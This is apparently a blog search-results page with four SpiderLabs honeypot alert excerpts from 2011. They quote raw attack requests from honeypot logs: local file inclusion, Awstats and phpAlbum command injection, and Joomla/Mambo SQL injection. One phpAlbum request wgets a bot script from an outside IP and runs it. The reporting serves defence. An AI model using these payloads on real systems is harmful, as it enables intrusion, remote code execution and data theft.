Showing 7 results for: December 2011 ×[Honeypot Alert] ×

[Honeypot Alert] User Agent Field Arbitrary PHP Code Execution

While reviewing today's web honeypot logs, SpiderLabs Research identified two new attack variations. Focus on Local File Inclusion attacks Here are some of the LFI attack payloads identified today: GET /_functions.php?prefix=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00...

[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs: GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1 GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1 GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET...

[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs: GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0 GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d...

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of Wordpress/Joomla/Mambo components. GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1 GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&filter=&city_id=&function_id=&limit=5&pageno=1&job_id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1 GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET...